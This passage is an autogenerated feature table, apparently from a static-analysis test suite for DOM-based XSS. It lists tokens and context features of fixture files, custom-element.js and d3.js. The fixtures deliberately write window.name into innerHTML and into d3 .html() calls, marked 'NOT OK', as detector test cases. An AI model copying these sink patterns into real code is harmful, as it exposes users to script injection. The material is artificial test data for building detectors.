autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | 'arguments' object of default constructor of class CustomElm | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | (...arg ... rgs); } | assignedToPropName | constructor | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | (...arg ... rgs); } | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | (...arg ... rgs); } | contextSurroundingFunctionParameters | (args) | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | (...arg ... rgs); } | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | ...args | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | ...args | contextSurroundingFunctionParameters | (args) | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | ...args | enclosingFunctionBody | args | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | ...args | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | ...args | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | args | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | args | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | args | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | args | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | args | contextSurroundingFunctionParameters | (args) | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | args | contextSurroundingFunctionParameters | (args) | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | args | enclosingFunctionBody | args | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | args | enclosingFunctionBody | args | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | args | enclosingFunctionBody | args | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | args | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | args | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | args | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | args | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | args | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | args | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | constru ... rgs); } | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | constru ... rgs); } | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | constru ... rgs); } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | constru ... rgs); } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | constru ... rgs); } | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | constru ... rgs); } | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | constructor | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | constructor | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | constructor | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | exceptional return of default constructor of class CustomElm | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | exceptional return of default constructor of class CustomElm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | exceptional return of default constructor of class CustomElm | enclosingFunctionBody | args | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | exceptional return of default constructor of class CustomElm | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | exceptional return of default constructor of class CustomElm | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | exceptional return of super(...args) | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | exceptional return of super(...args) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | exceptional return of super(...args) | enclosingFunctionBody | args | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | exceptional return of super(...args) | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | exceptional return of super(...args) | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | return of default constructor of class CustomElm | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | return of default constructor of class CustomElm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | return of default constructor of class CustomElm | enclosingFunctionBody | args | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | return of default constructor of class CustomElm | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | return of default constructor of class CustomElm | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | super | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | super | contextSurroundingFunctionParameters | (args) | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | super | enclosingFunctionBody | args | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | super | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | super | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | super(...args) | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | super(...args) | contextSurroundingFunctionParameters | (args) | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | super(...args) | enclosingFunctionBody | args | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | super(...args) | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | super(...args) | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | this | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | this | enclosingFunctionBody | args | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | this | enclosingFunctionName | constructor | +| autogenerated/Xss/DomBasedXss/custom-element.js:3:37:3:36 | this | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:5:4:8 | test | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:5:4:8 | test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:5:4:8 | test | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:5:6:5 | test() ... K\\n } | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:5:6:5 | test() ... K\\n } | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:5:6:5 | test() ... K\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:5:6:5 | test() ... K\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:5:6:5 | test() ... K\\n } | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:5:6:5 | test() ... K\\n } | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:4:8 | this | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:4:8 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:4:8 | this | enclosingFunctionBody | innerHTML window name | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:4:8 | this | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:4:8 | this | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:6:5 | 'arguments' object of method test of class CustomElm | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:6:5 | 'arguments' object of method test of class CustomElm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:6:5 | 'arguments' object of method test of class CustomElm | enclosingFunctionBody | innerHTML window name | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:6:5 | 'arguments' object of method test of class CustomElm | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:6:5 | 'arguments' object of method test of class CustomElm | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:6:5 | () {\\n ... K\\n } | assignedToPropName | test | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:6:5 | () {\\n ... K\\n } | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:6:5 | () {\\n ... K\\n } | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:6:5 | () {\\n ... K\\n } | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:6:5 | exceptional return of method test of class CustomElm | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:6:5 | exceptional return of method test of class CustomElm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:6:5 | exceptional return of method test of class CustomElm | enclosingFunctionBody | innerHTML window name | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:6:5 | exceptional return of method test of class CustomElm | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:6:5 | exceptional return of method test of class CustomElm | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:6:5 | return of method test of class CustomElm | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:6:5 | return of method test of class CustomElm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:6:5 | return of method test of class CustomElm | enclosingFunctionBody | innerHTML window name | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:6:5 | return of method test of class CustomElm | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/custom-element.js:4:9:6:5 | return of method test of class CustomElm | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:9:5:12 | this | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:9:5:12 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:9:5:12 | this | enclosingFunctionBody | innerHTML window name | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:9:5:12 | this | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:9:5:12 | this | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:9:5:22 | this.innerHTML | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:9:5:22 | this.innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:9:5:22 | this.innerHTML | enclosingFunctionBody | innerHTML window name | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:9:5:22 | this.innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:9:5:22 | this.innerHTML | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:9:5:36 | this.in ... ow.name | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:9:5:36 | this.in ... ow.name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:9:5:36 | this.in ... ow.name | enclosingFunctionBody | innerHTML window name | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:9:5:36 | this.in ... ow.name | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:9:5:36 | this.in ... ow.name | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:14:5:22 | innerHTML | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:14:5:22 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:14:5:22 | innerHTML | enclosingFunctionBody | innerHTML window name | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:14:5:22 | innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:14:5:22 | innerHTML | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:26:5:31 | window | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:26:5:31 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:26:5:31 | window | enclosingFunctionBody | innerHTML window name | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:26:5:31 | window | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:26:5:31 | window | fileImports | dummy | | autogenerated/Xss/DomBasedXss/custom-element.js:5:26:5:36 | window.name | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/custom-element.js:5:26:5:36 | window.name | contextFunctionInterfaces | constructor(args)\ntest() | | autogenerated/Xss/DomBasedXss/custom-element.js:5:26:5:36 | window.name | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/custom-element.js:5:26:5:36 | window.name | enclosingFunctionBody | innerHTML window name | | autogenerated/Xss/DomBasedXss/custom-element.js:5:26:5:36 | window.name | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/custom-element.js:5:26:5:36 | window.name | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:33:5:36 | name | contextFunctionInterfaces | constructor(args)\ntest() | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:33:5:36 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:33:5:36 | name | enclosingFunctionBody | innerHTML window name | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:33:5:36 | name | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/custom-element.js:5:33:5:36 | name | fileImports | dummy | +| autogenerated/Xss/DomBasedXss/d3.js:1:1:1:0 | this | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:1:1:1:0 | this | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:1:1:1:1 | d3 | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:1:1:1:1 | d3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:1:1:1:1 | d3 | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:1:1:1:1 | getTaint | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:1:1:1:1 | getTaint | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:1:1:1:1 | getTaint | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:1:1:1:1 | otherFunction | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:1:1:1:1 | otherFunction | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:1:1:1:1 | otherFunction | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:1:1:1:1 | require | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:1:1:1:1 | require | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:1:7:1:8 | d3 | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:1:7:1:8 | d3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:1:7:1:8 | d3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:1:7:1:8 | d3 | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:1:7:1:24 | d3 | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:1:7:1:24 | d3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:1:7:1:24 | d3 | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:1:7:1:24 | d3 = require('d3') | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:1:7:1:24 | d3 = require('d3') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:1:7:1:24 | d3 = require('d3') | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:1:12:1:18 | require | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:1:12:1:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:1:12:1:18 | require | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:1:12:1:24 | exceptional return of require('d3') | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:1:12:1:24 | exceptional return of require('d3') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:1:12:1:24 | exceptional return of require('d3') | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:1:12:1:24 | require('d3') | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:1:12:1:24 | require('d3') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:1:12:1:24 | require('d3') | fileImports | d3 | | autogenerated/Xss/DomBasedXss/d3.js:1:20:1:23 | 'd3' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/DomBasedXss/d3.js:1:20:1:23 | 'd3' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/d3.js:1:20:1:23 | 'd3' | calleeImports | | | autogenerated/Xss/DomBasedXss/d3.js:1:20:1:23 | 'd3' | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | | autogenerated/Xss/DomBasedXss/d3.js:1:20:1:23 | 'd3' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/d3.js:1:20:1:23 | 'd3' | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:3:1:3:0 | this | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:3:1:3:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:3:1:3:0 | this | enclosingFunctionBody | window name | +| autogenerated/Xss/DomBasedXss/d3.js:3:1:3:0 | this | enclosingFunctionName | getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:3:1:3:0 | this | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:3:1:5:1 | 'arguments' object of function getTaint | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:3:1:5:1 | 'arguments' object of function getTaint | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:3:1:5:1 | 'arguments' object of function getTaint | enclosingFunctionBody | window name | +| autogenerated/Xss/DomBasedXss/d3.js:3:1:5:1 | 'arguments' object of function getTaint | enclosingFunctionName | getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:3:1:5:1 | 'arguments' object of function getTaint | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:3:1:5:1 | exceptional return of function getTaint | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:3:1:5:1 | exceptional return of function getTaint | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:3:1:5:1 | exceptional return of function getTaint | enclosingFunctionBody | window name | +| autogenerated/Xss/DomBasedXss/d3.js:3:1:5:1 | exceptional return of function getTaint | enclosingFunctionName | getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:3:1:5:1 | exceptional return of function getTaint | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:3:1:5:1 | functio ... name;\\n} | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:3:1:5:1 | functio ... name;\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:3:1:5:1 | functio ... name;\\n} | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:3:1:5:1 | return of function getTaint | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:3:1:5:1 | return of function getTaint | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:3:1:5:1 | return of function getTaint | enclosingFunctionBody | window name | +| autogenerated/Xss/DomBasedXss/d3.js:3:1:5:1 | return of function getTaint | enclosingFunctionName | getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:3:1:5:1 | return of function getTaint | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:3:10:3:17 | getTaint | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:3:10:3:17 | getTaint | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:3:10:3:17 | getTaint | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:3:10:3:17 | getTaint | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:3:10:3:17 | getTaint | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:3:10:3:17 | getTaint | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:3:10:3:17 | getTaint | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:4:12:4:17 | window | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:4:12:4:17 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:4:12:4:17 | window | enclosingFunctionBody | window name | +| autogenerated/Xss/DomBasedXss/d3.js:4:12:4:17 | window | enclosingFunctionName | getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:4:12:4:17 | window | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:4:12:4:22 | window.name | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:4:12:4:22 | window.name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:4:12:4:22 | window.name | enclosingFunctionBody | window name | +| autogenerated/Xss/DomBasedXss/d3.js:4:12:4:22 | window.name | enclosingFunctionName | getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:4:12:4:22 | window.name | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:4:19:4:22 | name | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:4:19:4:22 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/d3.js:4:19:4:22 | name | enclosingFunctionBody | window name | +| autogenerated/Xss/DomBasedXss/d3.js:4:19:4:22 | name | enclosingFunctionName | getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:4:19:4:22 | name | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:7:0 | d3 | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:7:0 | d3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:7:0 | d3 | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:7:0 | d3 | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:7:0 | d3 | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:7:0 | getTaint | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:7:0 | getTaint | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:7:0 | getTaint | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:7:0 | getTaint | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:7:0 | getTaint | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:7:0 | otherFunction | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:7:0 | otherFunction | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:7:0 | otherFunction | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:7:0 | otherFunction | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:7:0 | otherFunction | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:7:0 | this | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:7:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:7:0 | this | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:7:0 | this | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:7:0 | this | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:15:1 | 'arguments' object of function doSomething | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:15:1 | 'arguments' object of function doSomething | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:15:1 | 'arguments' object of function doSomething | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:15:1 | 'arguments' object of function doSomething | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:15:1 | 'arguments' object of function doSomething | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:15:1 | exceptional return of function doSomething | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:15:1 | exceptional return of function doSomething | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:15:1 | exceptional return of function doSomething | enclosingFunctionBody | d3 select #main attr width 100 style color red html getTaint html d getTaint call otherFunction html d getTaint | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:15:1 | exceptional return of function doSomething | enclosingFunctionName | doSomething | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:15:1 | exceptional return of function doSomething | fileImports | d3 | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:15:1 | functio ... OT OK\\n} | contextFunctionInterfaces | doSomething()\ngetTaint()\notherFunction(selection) | +| autogenerated/Xss/DomBasedXss/d3.js:7:1:15:1 | functio ... OT OK\\n} | 